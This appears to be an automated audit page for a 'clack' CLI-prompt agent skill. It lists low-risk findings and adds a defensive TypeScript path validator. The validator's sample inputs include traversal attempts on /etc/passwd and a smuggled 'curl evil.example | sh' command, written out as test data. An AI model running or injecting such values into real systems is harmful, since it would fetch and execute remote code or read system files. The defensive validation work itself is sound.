clack
Pass
Audited by Gen Agent Trust Hub on Feb 20, 2026
Risk Level: SAFE
Full Analysis
- [EXTERNAL_DOWNLOADS] (LOW): The `scripts/sync_references.sh` script contains a `git clone` command targeting the official repository for the Clack library (https://github.com/bombshell-dev/clack.git). This is a maintenance script and does not pose a runtime risk to the user.
- [DATA_EXPOSURE] (LOW): The `references/source/prompts/path.ts` file implements a filesystem navigation component. This allows the CLI to read directory contents and file names for autocomplete functionality. While this accesses the local filesystem, it is limited to metadata (filenames) and is the intended primary purpose of the component.
- [DYNAMIC_EXECUTION] (SAFE): The examples use `jiti` for just-in-time execution of TypeScript files. This is standard developer tooling for the Node.js ecosystem and is used here in a controlled context for demonstration purposes.
- [INDIRECT_PROMPT_INJECTION] (LOW): The skill provides tools for ingesting user input via terminal prompts. While this is a potential attack surface if the agent were to blindly execute output from these prompts, the library includes built-in validation mechanisms (as seen in `text.ts` and examples) to sanitize and constrain input.
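The two LOW findings above share one mitigation: whatever a prompt returns should be constrained before an agent acts on it, and a path prompt should not be allowed to wander outside the directory it was meant to browse. The validator below is an added example written for this audit page; it is not code from the Clack library or from the audited skill. It assumes the shape of Clack's `validate` option (a callback that returns a rejection message as a string, or `undefined` to accept) and a hypothetical workspace root of `/tmp/workspace`; the rejection rules themselves are this example's own choice.

```typescript
import * as path from "node:path";

// Assumed sandbox root for the example (hypothetical; the real skill
// decides its own browsing root). Any answer that resolves outside it is rejected.
const WORKSPACE_ROOT = path.resolve("/tmp/workspace");

// Characters that would change meaning if the answer were ever interpolated
// into a shell command or log line by a downstream agent.
const SHELL_METACHARS = /[\r\n;&|`$<>]/;

// Validator in the shape Clack's `validate` option expects (assumption):
// return a string to reject the answer, undefined to accept it.
function validatePath(input: string, root: string = WORKSPACE_ROOT): string | undefined {
  if (input.length === 0) {
    return "A path is required";
  }
  if (input.includes("\0")) {
    return "NUL bytes are not allowed";
  }
  if (SHELL_METACHARS.test(input)) {
    return "Shell metacharacters are not allowed";
  }
  // Resolve relative to the root, then check the answer did not escape it.
  // Comparing the relative path (not the string prefix) avoids the classic
  // "/tmp/workspace2" prefix bypass and correctly accepts names like "..hidden".
  const resolved = path.resolve(root, input);
  const rel = path.relative(root, resolved);
  if (rel === ".." || rel.startsWith(".." + path.sep) || path.isAbsolute(rel)) {
    return "Path escapes the workspace root";
  }
  return undefined;
}

// Convenience for a caller that wants a boolean instead of a message.
function isAcceptablePath(input: string, root: string = WORKSPACE_ROOT): boolean {
  return validatePath(input, root) === undefined;
}

// Constructed sample answers, as a user (or a hostile autocomplete entry)
// might supply them; not captured from any real session.
const SAMPLE_ANSWERS = [
  "src/index.ts",
  "..hidden/config",
  "../etc/passwd",
  "/etc/passwd",
  "notes.txt; curl evil.example | sh",
  "",
];

function main(): void {
  for (const answer of SAMPLE_ANSWERS) {
    const verdict = validatePath(answer) ?? "accepted";
    console.log(`${JSON.stringify(answer)} -> ${verdict}`);
  }
}

main();
```

In a real prompt this plugs in as `text({ message: "File to open", validate: validatePath })`; the point is that the agent consuming the answer never sees a value that has not already passed the same check, so "blindly executing" the prompt output is bounded by the validator rather than by the agent's judgement.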
Audit Metadata